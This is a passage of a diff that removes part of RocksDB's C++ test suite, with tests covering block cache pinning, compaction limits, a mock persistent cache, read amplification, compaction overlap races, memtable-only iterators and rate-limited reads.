-    ASSERT_EQ(fh, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-    ASSERT_EQ(im, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-    ASSERT_EQ(ih, TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-  }
-  std::string value;
-  // this should be read from L0
-  value = Get(1, "a2");
-  // If max_open_files is -1, we have pinned index and filter in Rep, so there
-  // will not be changes in index and filter misses or hits. If max_open_files
-  // is not -1, Get() will open a TableReader and prefetch index and filter.
-  ASSERT_EQ(fm + 1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(fh, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-  ASSERT_EQ(im + 1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-  ASSERT_EQ(ih, TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-
-  // this should be read from L1
-  value = Get(1, "a");
-  if (infinite_max_files_) {
-    // In inifinite max files case, there's a cache miss in executing Get()
-    // because index and filter are not prefetched before.
-    ASSERT_EQ(fm + 2, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-    ASSERT_EQ(fh, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-    ASSERT_EQ(im + 2, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-    ASSERT_EQ(ih, TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-  } else {
-    // In this case, cache miss will be increased by one in
-    // BlockBasedTable::Open() because this is not in DB::Open() code path so we
-    // will prefetch L1's index and filter. Cache hit will also be increased by
-    // one because Get() will read index and filter from the block cache
-    // prefetched in previous Open() call.
-    ASSERT_EQ(fm + 2, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-    ASSERT_EQ(fh + 1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-    ASSERT_EQ(im + 2, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-    ASSERT_EQ(ih + 1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-  }
-}
-
-INSTANTIATE_TEST_CASE_P(PinL0IndexAndFilterBlocksTest,
-                        PinL0IndexAndFilterBlocksTest, ::testing::Bool());
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest2, MaxCompactionBytesTest) {
-  Options options = CurrentOptions();
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(DBTestBase::kNumKeysByGenerateNewRandomFile));
-  options.compaction_style = kCompactionStyleLevel;
-  options.write_buffer_size = 200 << 10;
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 4;
-  options.num_levels = 4;
-  options.compression = kNoCompression;
-  options.max_bytes_for_level_base = 450 << 10;
-  options.target_file_size_base = 100 << 10;
-  // Infinite for full compaction.
-  options.max_compaction_bytes = options.target_file_size_base * 100;
-
-  Reopen(options);
-
-  Random rnd(301);
-
-  for (int num = 0; num < 8; num++) {
-    GenerateNewRandomFile(&rnd);
-  }
-  CompactRangeOptions cro;
-  cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
-  ASSERT_OK(db_->CompactRange(cro, nullptr, nullptr));
-  ASSERT_EQ("0,0,8", FilesPerLevel(0));
-
-  // When compact from Ln -> Ln+1, cut a file if the file overlaps with
-  // more than three files in Ln+1.
-  options.max_compaction_bytes = options.target_file_size_base * 3;
-  Reopen(options);
-
-  GenerateNewRandomFile(&rnd);
-  // Add three more small files that overlap with the previous file
-  for (int i = 0; i < 3; i++) {
-    Put("a", "z");
-    ASSERT_OK(Flush());
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  // Output files to L1 are cut to three pieces, according to
-  // options.max_compaction_bytes
-  ASSERT_EQ("0,3,8", FilesPerLevel(0));
-}
-
-static void UniqueIdCallback(void* arg) {
-  int* result = reinterpret_cast<int*>(arg);
-  if (*result == -1) {
-    *result = 0;
-  }
-
-  rocksdb::SyncPoint::GetInstance()->ClearTrace();
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "GetUniqueIdFromFile:FS_IOC_GETVERSION", UniqueIdCallback);
-}
-
-class MockPersistentCache : public PersistentCache {
- public:
-  explicit MockPersistentCache(const bool is_compressed, const size_t max_size)
-      : is_compressed_(is_compressed), max_size_(max_size) {
-    rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-    rocksdb::SyncPoint::GetInstance()->SetCallBack(
-        "GetUniqueIdFromFile:FS_IOC_GETVERSION", UniqueIdCallback);
-  }
-
-  virtual ~MockPersistentCache() {}
-
-  PersistentCache::StatsType Stats() override {
-    return PersistentCache::StatsType();
-  }
-
-  Status Insert(const Slice& page_key, const char* data,
-                const size_t size) override {
-    MutexLock _(&lock_);
-
-    if (size_ > max_size_) {
-      size_ -= data_.begin()->second.size();
-      data_.erase(data_.begin());
-    }
-
-    data_.insert(std::make_pair(page_key.ToString(), std::string(data, size)));
-    size_ += size;
-    return Status::OK();
-  }
-
-  Status Lookup(const Slice& page_key, std::unique_ptr<char[]>* data,
-                size_t* size) override {
-    MutexLock _(&lock_);
-    auto it = data_.find(page_key.ToString());
-    if (it == data_.end()) {
-      return Status::NotFound();
-    }
-
-    assert(page_key.ToString() == it->first);
-    data->reset(new char[it->second.size()]);
-    memcpy(data->get(), it->second.c_str(), it->second.size());
-    *size = it->second.size();
-    return Status::OK();
-  }
-
-  bool IsCompressed() override { return is_compressed_; }
-
-  std::string GetPrintableOptions() const override {
-    return "MockPersistentCache";
-  }
-
-  port::Mutex lock_;
-  std::map<std::string, std::string> data_;
-  const bool is_compressed_ = true;
-  size_t size_ = 0;
-  const size_t max_size_ = 10 * 1024;  // 10KiB
-};
-
-#ifndef OS_SOLARIS // GetUniqueIdFromFile is not implemented
-TEST_F(DBTest2, PersistentCache) {
-  int num_iter = 80;
-
-  Options options;
-  options.write_buffer_size = 64 * 1024;  // small write buffer
-  options.statistics = rocksdb::CreateDBStatistics();
-  options = CurrentOptions(options);
-
-  auto bsizes = {/*no block cache*/ 0, /*1M*/ 1 * 1024 * 1024};
-  auto types = {/*compressed*/ 1, /*uncompressed*/ 0};
-  for (auto bsize : bsizes) {
-    for (auto type : types) {
-      BlockBasedTableOptions table_options;
-      table_options.persistent_cache.reset(
-          new MockPersistentCache(type, 10 * 1024));
-      table_options.no_block_cache = true;
-      table_options.block_cache = bsize ? NewLRUCache(bsize) : nullptr;
-      table_options.block_cache_compressed = nullptr;
-      options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-      DestroyAndReopen(options);
-      CreateAndReopenWithCF({"pikachu"}, options);
-      // default column family doesn't have block cache
-      Options no_block_cache_opts;
-      no_block_cache_opts.statistics = options.statistics;
-      no_block_cache_opts = CurrentOptions(no_block_cache_opts);
-      BlockBasedTableOptions table_options_no_bc;
-      table_options_no_bc.no_block_cache = true;
-      no_block_cache_opts.table_factory.reset(
-          NewBlockBasedTableFactory(table_options_no_bc));
-      ReopenWithColumnFamilies(
-          {"default", "pikachu"},
-          std::vector<Options>({no_block_cache_opts, options}));
-
-      Random rnd(301);
-
-      // Write 8MB (80 values, each 100K)
-      ASSERT_EQ(NumTableFilesAtLevel(0, 1), 0);
-      std::vector<std::string> values;
-      std::string str;
-      for (int i = 0; i < num_iter; i++) {
-        if (i % 4 == 0) {  // high compression ratio
-          str = RandomString(&rnd, 1000);
-        }
-        values.push_back(str);
-        ASSERT_OK(Put(1, Key(i), values[i]));
-      }
-
-      // flush all data from memtable so that reads are from block cache
-      ASSERT_OK(Flush(1));
-
-      for (int i = 0; i < num_iter; i++) {
-        ASSERT_EQ(Get(1, Key(i)), values[i]);
-      }
-
-      auto hit = options.statistics->getTickerCount(PERSISTENT_CACHE_HIT);
-      auto miss = options.statistics->getTickerCount(PERSISTENT_CACHE_MISS);
-
-      ASSERT_GT(hit, 0);
-      ASSERT_GT(miss, 0);
-    }
-  }
-}
-#endif // !OS_SOLARIS
-
-namespace {
-void CountSyncPoint() {
-  TEST_SYNC_POINT_CALLBACK("DBTest2::MarkedPoint", nullptr /* arg */);
-}
-}  // namespace
-
-TEST_F(DBTest2, SyncPointMarker) {
-  std::atomic<int> sync_point_called(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBTest2::MarkedPoint",
-      [&](void* arg) { sync_point_called.fetch_add(1); });
-
-  // The first dependency enforces Marker can be loaded before MarkedPoint.
-  // The second checks that thread 1's MarkedPoint should be disabled here.
-  // Execution order:
-  // |   Thread 1    |  Thread 2   |
-  // |               |   Marker    |
-  // |  MarkedPoint  |             |
-  // | Thread1First  |             |
-  // |               | MarkedPoint |
-  rocksdb::SyncPoint::GetInstance()->LoadDependencyAndMarkers(
-      {{"DBTest2::SyncPointMarker:Thread1First", "DBTest2::MarkedPoint"}},
-      {{"DBTest2::SyncPointMarker:Marker", "DBTest2::MarkedPoint"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  std::function<void()> func1 = [&]() {
-    CountSyncPoint();
-    TEST_SYNC_POINT("DBTest2::SyncPointMarker:Thread1First");
-  };
-
-  std::function<void()> func2 = [&]() {
-    TEST_SYNC_POINT("DBTest2::SyncPointMarker:Marker");
-    CountSyncPoint();
-  };
-
-  auto thread1 = port::Thread(func1);
-  auto thread2 = port::Thread(func2);
-  thread1.join();
-  thread2.join();
-
-  // Callback is only executed once
-  ASSERT_EQ(sync_point_called.load(), 1);
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-#endif
-
-size_t GetEncodedEntrySize(size_t key_size, size_t value_size) {
-  std::string buffer;
-
-  PutVarint32(&buffer, static_cast<uint32_t>(0));
-  PutVarint32(&buffer, static_cast<uint32_t>(key_size));
-  PutVarint32(&buffer, static_cast<uint32_t>(value_size));
-
-  return buffer.size() + key_size + value_size;
-}
-
-TEST_F(DBTest2, ReadAmpBitmap) {
-  Options options = CurrentOptions();
-  BlockBasedTableOptions bbto;
-  uint32_t bytes_per_bit[2] = {1, 16};
-  for (size_t k = 0; k < 2; k++) {
-    // Disable delta encoding to make it easier to calculate read amplification
-    bbto.use_delta_encoding = false;
-    // Huge block cache to make it easier to calculate read amplification
-    bbto.block_cache = NewLRUCache(1024 * 1024 * 1024);
-    bbto.read_amp_bytes_per_bit = bytes_per_bit[k];
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    options.statistics = rocksdb::CreateDBStatistics();
-    DestroyAndReopen(options);
-
-    const size_t kNumEntries = 10000;
-
-    Random rnd(301);
-    for (size_t i = 0; i < kNumEntries; i++) {
-      ASSERT_OK(Put(Key(static_cast<int>(i)), RandomString(&rnd, 100)));
-    }
-    ASSERT_OK(Flush());
-
-    Close();
-    Reopen(options);
-
-    // Read keys/values randomly and verify that reported read amp error
-    // is less than 2%
-    uint64_t total_useful_bytes = 0;
-    std::set<int> read_keys;
-    std::string value;
-    for (size_t i = 0; i < kNumEntries * 5; i++) {
-      int key_idx = rnd.Next() % kNumEntries;
-      std::string key = Key(key_idx);
-      ASSERT_OK(db_->Get(ReadOptions(), key, &value));
-
-      if (read_keys.find(key_idx) == read_keys.end()) {
-        auto internal_key = InternalKey(key, 0, ValueType::kTypeValue);
-        total_useful_bytes +=
-            GetEncodedEntrySize(internal_key.size(), value.size());
-        read_keys.insert(key_idx);
-      }
-
-      double expected_read_amp =
-          static_cast<double>(total_useful_bytes) /
-          options.statistics->getTickerCount(READ_AMP_TOTAL_READ_BYTES);
-
-      double read_amp =
-          static_cast<double>(options.statistics->getTickerCount(
-              READ_AMP_ESTIMATE_USEFUL_BYTES)) /
-          options.statistics->getTickerCount(READ_AMP_TOTAL_READ_BYTES);
-
-      double error_pct = fabs(expected_read_amp - read_amp) * 100;
-      // Error between reported read amp and real read amp should be less than
-      // 2%
-      EXPECT_LE(error_pct, 2);
-    }
-
-    // Make sure we read every thing in the DB (which is smaller than our cache)
-    Iterator* iter = db_->NewIterator(ReadOptions());
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      ASSERT_EQ(iter->value().ToString(), Get(iter->key().ToString()));
-    }
-    delete iter;
-
-    // Read amp is on average 100% since we read all what we loaded in memory
-    if (k == 0) {
-      ASSERT_EQ(
-          options.statistics->getTickerCount(READ_AMP_ESTIMATE_USEFUL_BYTES),
-          options.statistics->getTickerCount(READ_AMP_TOTAL_READ_BYTES));
-    } else {
-      ASSERT_NEAR(
-          options.statistics->getTickerCount(READ_AMP_ESTIMATE_USEFUL_BYTES) *
-              1.0f /
-              options.statistics->getTickerCount(READ_AMP_TOTAL_READ_BYTES),
-          1, .01);
-    }
-  }
-}
-
-#ifndef OS_SOLARIS // GetUniqueIdFromFile is not implemented
-TEST_F(DBTest2, ReadAmpBitmapLiveInCacheAfterDBClose) {
-  if (dbname_.find("dev/shm") != std::string::npos) {
-    // /dev/shm dont support getting a unique file id, this mean that
-    // running this test on /dev/shm will fail because lru_cache will load
-    // the blocks again regardless of them being already in the cache
-    return;
-  }
-  uint32_t bytes_per_bit[2] = {1, 16};
-  for (size_t k = 0; k < 2; k++) {
-    std::shared_ptr<Cache> lru_cache = NewLRUCache(1024 * 1024 * 1024);
-    std::shared_ptr<Statistics> stats = rocksdb::CreateDBStatistics();
-
-    Options options = CurrentOptions();
-    BlockBasedTableOptions bbto;
-    // Disable delta encoding to make it easier to calculate read amplification
-    bbto.use_delta_encoding = false;
-    // Huge block cache to make it easier to calculate read amplification
-    bbto.block_cache = lru_cache;
-    bbto.read_amp_bytes_per_bit = bytes_per_bit[k];
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    options.statistics = stats;
-    DestroyAndReopen(options);
-
-    const int kNumEntries = 10000;
-
-    Random rnd(301);
-    for (int i = 0; i < kNumEntries; i++) {
-      ASSERT_OK(Put(Key(i), RandomString(&rnd, 100)));
-    }
-    ASSERT_OK(Flush());
-
-    Close();
-    Reopen(options);
-
-    uint64_t total_useful_bytes = 0;
-    std::set<int> read_keys;
-    std::string value;
-    // Iter1: Read half the DB, Read even keys
-    // Key(0), Key(2), Key(4), Key(6), Key(8), ...
-    for (int i = 0; i < kNumEntries; i += 2) {
-      std::string key = Key(i);
-      ASSERT_OK(db_->Get(ReadOptions(), key, &value));
-
-      if (read_keys.find(i) == read_keys.end()) {
-        auto internal_key = InternalKey(key, 0, ValueType::kTypeValue);
-        total_useful_bytes +=
-            GetEncodedEntrySize(internal_key.size(), value.size());
-        read_keys.insert(i);
-      }
-    }
-
-    size_t total_useful_bytes_iter1 =
-        options.statistics->getTickerCount(READ_AMP_ESTIMATE_USEFUL_BYTES);
-    size_t total_loaded_bytes_iter1 =
-        options.statistics->getTickerCount(READ_AMP_TOTAL_READ_BYTES);
-
-    Close();
-    std::shared_ptr<Statistics> new_statistics = rocksdb::CreateDBStatistics();
-    // Destroy old statistics obj that the blocks in lru_cache are pointing to
-    options.statistics.reset();
-    // Use the statistics object that we just created
-    options.statistics = new_statistics;
-    Reopen(options);
-
-    // Iter2: Read half the DB, Read odd keys
-    // Key(1), Key(3), Key(5), Key(7), Key(9), ...
-    for (int i = 1; i < kNumEntries; i += 2) {
-      std::string key = Key(i);
-      ASSERT_OK(db_->Get(ReadOptions(), key, &value));
-
-      if (read_keys.find(i) == read_keys.end()) {
-        auto internal_key = InternalKey(key, 0, ValueType::kTypeValue);
-        total_useful_bytes +=
-            GetEncodedEntrySize(internal_key.size(), value.size());
-        read_keys.insert(i);
-      }
-    }
-
-    size_t total_useful_bytes_iter2 =
-        options.statistics->getTickerCount(READ_AMP_ESTIMATE_USEFUL_BYTES);
-    size_t total_loaded_bytes_iter2 =
-        options.statistics->getTickerCount(READ_AMP_TOTAL_READ_BYTES);
-
-
-    // Read amp is on average 100% since we read all what we loaded in memory
-    if (k == 0) {
-      ASSERT_EQ(total_useful_bytes_iter1 + total_useful_bytes_iter2,
-                total_loaded_bytes_iter1 + total_loaded_bytes_iter2);
-    } else {
-      ASSERT_NEAR((total_useful_bytes_iter1 + total_useful_bytes_iter2) * 1.0f /
-                      (total_loaded_bytes_iter1 + total_loaded_bytes_iter2),
-                  1, .01);
-    }
-  }
-}
-#endif // !OS_SOLARIS
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest2, AutomaticCompactionOverlapManualCompaction) {
-  Options options = CurrentOptions();
-  options.num_levels = 3;
-  options.IncreaseParallelism(20);
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put(Key(0), "a"));
-  ASSERT_OK(Put(Key(5), "a"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(Put(Key(10), "a"));
-  ASSERT_OK(Put(Key(15), "a"));
-  ASSERT_OK(Flush());
-
-  CompactRangeOptions cro;
-  cro.change_level = true;
-  cro.target_level = 2;
-  ASSERT_OK(db_->CompactRange(cro, nullptr, nullptr));
-
-  auto get_stat = [](std::string level_str, LevelStatType type,
-                     std::map<std::string, double> props) {
-    auto prop_str =
-        level_str + "." +
-        InternalStats::compaction_level_stats.at(type).property_name.c_str();
-    auto prop_item = props.find(prop_str);
-    return prop_item == props.end() ? 0 : prop_item->second;
-  };
-
-  // Trivial move 2 files to L2
-  ASSERT_EQ("0,0,2", FilesPerLevel());
-  // Also test that the stats GetMapProperty API reporting the same result
-  {
-    std::map<std::string, double> prop;
-    ASSERT_TRUE(dbfull()->GetMapProperty("rocksdb.cfstats", &prop));
-    ASSERT_EQ(0, get_stat("L0", LevelStatType::NUM_FILES, prop));
-    ASSERT_EQ(0, get_stat("L1", LevelStatType::NUM_FILES, prop));
-    ASSERT_EQ(2, get_stat("L2", LevelStatType::NUM_FILES, prop));
-    ASSERT_EQ(2, get_stat("Sum", LevelStatType::NUM_FILES, prop));
-  }
-
-  // While the compaction is running, we will create 2 new files that
-  // can fit in L2, these 2 files will be moved to L2 and overlap with
-  // the running compaction and break the LSM consistency.
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "CompactionJob::Run():Start", [&](void* arg) {
-        ASSERT_OK(
-            dbfull()->SetOptions({{"level0_file_num_compaction_trigger", "2"},
-                                  {"max_bytes_for_level_base", "1"}}));
-        ASSERT_OK(Put(Key(6), "a"));
-        ASSERT_OK(Put(Key(7), "a"));
-        ASSERT_OK(Flush());
-
-        ASSERT_OK(Put(Key(8), "a"));
-        ASSERT_OK(Put(Key(9), "a"));
-        ASSERT_OK(Flush());
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Run a manual compaction that will compact the 2 files in L2
-  // into 1 file in L2
-  cro.exclusive_manual_compaction = false;
-  cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
-  ASSERT_OK(db_->CompactRange(cro, nullptr, nullptr));
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  // Test that the stats GetMapProperty API reporting 1 file in L2
-  {
-    std::map<std::string, double> prop;
-    ASSERT_TRUE(dbfull()->GetMapProperty("rocksdb.cfstats", &prop));
-    ASSERT_EQ(1, get_stat("L2", LevelStatType::NUM_FILES, prop));
-  }
-}
-
-TEST_F(DBTest2, ManualCompactionOverlapManualCompaction) {
-  Options options = CurrentOptions();
-  options.num_levels = 2;
-  options.IncreaseParallelism(20);
-  options.disable_auto_compactions = true;
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put(Key(0), "a"));
-  ASSERT_OK(Put(Key(5), "a"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(Put(Key(10), "a"));
-  ASSERT_OK(Put(Key(15), "a"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-  // Trivial move 2 files to L1
-  ASSERT_EQ("0,2", FilesPerLevel());
-
-  std::function<void()> bg_manual_compact = [&]() {
-    std::string k1 = Key(6);
-    std::string k2 = Key(9);
-    Slice k1s(k1);
-    Slice k2s(k2);
-    CompactRangeOptions cro;
-    cro.exclusive_manual_compaction = false;
-    ASSERT_OK(db_->CompactRange(cro, &k1s, &k2s));
-  };
-  rocksdb::port::Thread bg_thread;
-
-  // While the compaction is running, we will create 2 new files that
-  // can fit in L1, these 2 files will be moved to L1 and overlap with
-  // the running compaction and break the LSM consistency.
-  std::atomic<bool> flag(false);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "CompactionJob::Run():Start", [&](void* arg) {
-        if (flag.exchange(true)) {
-          // We want to make sure to call this callback only once
-          return;
-        }
-        ASSERT_OK(Put(Key(6), "a"));
-        ASSERT_OK(Put(Key(7), "a"));
-        ASSERT_OK(Flush());
-
-        ASSERT_OK(Put(Key(8), "a"));
-        ASSERT_OK(Put(Key(9), "a"));
-        ASSERT_OK(Flush());
-
-        // Start a non-exclusive manual compaction in a bg thread
-        bg_thread = port::Thread(bg_manual_compact);
-        // This manual compaction conflict with the other manual compaction
-        // so it should wait until the first compaction finish
-        env_->SleepForMicroseconds(1000000);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Run a manual compaction that will compact the 2 files in L1
-  // into 1 file in L1
-  CompactRangeOptions cro;
-  cro.exclusive_manual_compaction = false;
-  cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
-  ASSERT_OK(db_->CompactRange(cro, nullptr, nullptr));
-  bg_thread.join();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBTest2, OptimizeForPointLookup) {
-  Options options = CurrentOptions();
-  Close();
-  options.OptimizeForPointLookup(2);
-  ASSERT_OK(DB::Open(options, dbname_, &db_));
-
-  ASSERT_OK(Put("foo", "v1"));
-  ASSERT_EQ("v1", Get("foo"));
-  Flush();
-  ASSERT_EQ("v1", Get("foo"));
-}
-
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest2, GetRaceFlush1) {
-  ASSERT_OK(Put("foo", "v1"));
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::GetImpl:1", "DBTest2::GetRaceFlush:1"},
-       {"DBTest2::GetRaceFlush:2", "DBImpl::GetImpl:2"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rocksdb::port::Thread t1([&] {
-    TEST_SYNC_POINT("DBTest2::GetRaceFlush:1");
-    ASSERT_OK(Put("foo", "v2"));
-    Flush();
-    TEST_SYNC_POINT("DBTest2::GetRaceFlush:2");
-  });
-
-  // Get() is issued after the first Put(), so it should see either
-  // "v1" or "v2".
-  ASSERT_NE("NOT_FOUND", Get("foo"));
-  t1.join();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBTest2, GetRaceFlush2) {
-  ASSERT_OK(Put("foo", "v1"));
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::GetImpl:3", "DBTest2::GetRaceFlush:1"},
-       {"DBTest2::GetRaceFlush:2", "DBImpl::GetImpl:4"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  port::Thread t1([&] {
-    TEST_SYNC_POINT("DBTest2::GetRaceFlush:1");
-    ASSERT_OK(Put("foo", "v2"));
-    Flush();
-    TEST_SYNC_POINT("DBTest2::GetRaceFlush:2");
-  });
-
-  // Get() is issued after the first Put(), so it should see either
-  // "v1" or "v2".
-  ASSERT_NE("NOT_FOUND", Get("foo"));
-  t1.join();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBTest2, DirectIO) {
-  if (!IsDirectIOSupported()) {
-    return;
-  }
-  Options options = CurrentOptions();
-  options.use_direct_reads = options.use_direct_io_for_flush_and_compaction =
-      true;
-  options.allow_mmap_reads = options.allow_mmap_writes = false;
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put(Key(0), "a"));
-  ASSERT_OK(Put(Key(5), "a"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(Put(Key(10), "a"));
-  ASSERT_OK(Put(Key(15), "a"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  Reopen(options);
-}
-
-TEST_F(DBTest2, MemtableOnlyIterator) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ASSERT_OK(Put(1, "foo", "first"));
-  ASSERT_OK(Put(1, "bar", "second"));
-
-  ReadOptions ropt;
-  ropt.read_tier = kMemtableTier;
-  std::string value;
-  Iterator* it = nullptr;
-
-  // Before flushing
-  // point lookups
-  ASSERT_OK(db_->Get(ropt, handles_[1], "foo", &value));
-  ASSERT_EQ("first", value);
-  ASSERT_OK(db_->Get(ropt, handles_[1], "bar", &value));
-  ASSERT_EQ("second", value);
-
-  // Memtable-only iterator (read_tier=kMemtableTier); data not flushed yet.
-  it = db_->NewIterator(ropt, handles_[1]);
-  int count = 0;
-  for (it->SeekToFirst(); it->Valid(); it->Next()) {
-    ASSERT_TRUE(it->Valid());
-    count++;
-  }
-  ASSERT_TRUE(!it->Valid());
-  ASSERT_EQ(2, count);
-  delete it;
-
-  Flush(1);
-
-  // After flushing
-  // point lookups
-  ASSERT_OK(db_->Get(ropt, handles_[1], "foo", &value));
-  ASSERT_EQ("first", value);
-  ASSERT_OK(db_->Get(ropt, handles_[1], "bar", &value));
-  ASSERT_EQ("second", value);
-  // nothing should be returned using memtable-only iterator after flushing.
-  it = db_->NewIterator(ropt, handles_[1]);
-  count = 0;
-  for (it->SeekToFirst(); it->Valid(); it->Next()) {
-    ASSERT_TRUE(it->Valid());
-    count++;
-  }
-  ASSERT_TRUE(!it->Valid());
-  ASSERT_EQ(0, count);
-  delete it;
-
-  // Add a key to memtable
-  ASSERT_OK(Put(1, "foobar", "third"));
-  it = db_->NewIterator(ropt, handles_[1]);
-  count = 0;
-  for (it->SeekToFirst(); it->Valid(); it->Next()) {
-    ASSERT_TRUE(it->Valid());
-    ASSERT_EQ("foobar", it->key().ToString());
-    ASSERT_EQ("third", it->value().ToString());
-    count++;
-  }
-  ASSERT_TRUE(!it->Valid());
-  ASSERT_EQ(1, count);
-  delete it;
-}
-
-TEST_F(DBTest2, LowPriWrite) {
-  Options options = CurrentOptions();
-  // Compaction pressure should trigger since 6 files
-  options.level0_file_num_compaction_trigger = 4;
-  options.level0_slowdown_writes_trigger = 12;
-  options.level0_stop_writes_trigger = 30;
-  options.delayed_write_rate = 8 * 1024 * 1024;
-  Reopen(options);
-
-  std::atomic<int> rate_limit_count(0);
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "GenericRateLimiter::Request:1", [&](void* arg) {
-        rate_limit_count.fetch_add(1);
-        int64_t* rate_bytes_per_sec = static_cast<int64_t*>(arg);
-        ASSERT_EQ(1024 * 1024, *rate_bytes_per_sec);
-      });
-  // Block compaction
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DBTest.LowPriWrite:0", "DBImpl::BGWorkCompaction"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  WriteOptions wo;
-  for (int i = 0; i < 6; i++) {
-    wo.low_pri = false;
-    Put("", "", wo);
-    wo.low_pri = true;
-    Put("", "", wo);
-    Flush();
-  }
-  ASSERT_EQ(0, rate_limit_count.load());
-  wo.low_pri = true;
-  Put("", "", wo);
-  ASSERT_EQ(1, rate_limit_count.load());
-  wo.low_pri = false;
-  Put("", "", wo);
-  ASSERT_EQ(1, rate_limit_count.load());
-
-  TEST_SYNC_POINT("DBTest.LowPriWrite:0");
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  dbfull()->TEST_WaitForCompact();
-  wo.low_pri = true;
-  Put("", "", wo);
-  ASSERT_EQ(1, rate_limit_count.load());
-  wo.low_pri = false;
-  Put("", "", wo);
-  ASSERT_EQ(1, rate_limit_count.load());
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest2, RateLimitedCompactionReads) {
-  // compaction input has 512KB data
-  const int kNumKeysPerFile = 128;
-  const int kBytesPerKey = 1024;
-  const int kNumL0Files = 4;
-
-  for (auto use_direct_io : {false, true}) {
-    if (use_direct_io && !IsDirectIOSupported()) {
-      continue;
-    }
-    Options options = CurrentOptions();
-    options.compression = kNoCompression;
-    options.level0_file_num_compaction_trigger = kNumL0Files;
-    options.memtable_factory.reset(new SpecialSkipListFactory(kNumKeysPerFile));
-    options.new_table_reader_for_compaction_inputs = true;
-    // takes roughly one second, split into 100 x 10ms intervals. Each interval
-    // permits 5.12KB, which is smaller than the block size, so this test
-    // exercises the code for chunking reads.
-    options.rate_limiter.reset(NewGenericRateLimiter(
-        static_cast<int64_t>(kNumL0Files * kNumKeysPerFile *
-                             kBytesPerKey) /* rate_bytes_per_sec */,
-        10 * 1000 /* refill_period_us */, 10 /* fairness */,
-        RateLimiter::Mode::kReadsOnly));
-    options.use_direct_io_for_flush_and_compaction = use_direct_io;
-    BlockBasedTableOptions bbto;
-    bbto.block_size = 16384;
-    bbto.no_block_cache = true;
-    options.table_factory.reset(new BlockBasedTableFactory(bbto));
-    DestroyAndReopen(options);
-
-    for (int i = 0; i < kNumL0Files; ++i) {
-      for (int j = 0; j <= kNumKeysPerFile; ++j) {
-        ASSERT_OK(Put(Key(j), DummyString(kBytesPerKey)));
-      }
-      dbfull()->TEST_WaitForFlushMemTable();
-      ASSERT_EQ(i + 1, NumTableFilesAtLevel(0));
-    }
-    dbfull()->TEST_WaitForCompact();
-    ASSERT_EQ(0, NumTableFilesAtLevel(0));
-
-    ASSERT_EQ(0, options.rate_limiter->GetTotalBytesThrough(Env::IO_HIGH));
-    // should be slightly above 512KB due to non-data blocks read. Arbitrarily
-    // chose 1MB as the upper bound on the total bytes read.
-    size_t rate_limited_bytes =
-        options.rate_limiter->GetTotalBytesThrough(Env::IO_LOW);
-    // Include the explict prefetch of the footer in direct I/O case.
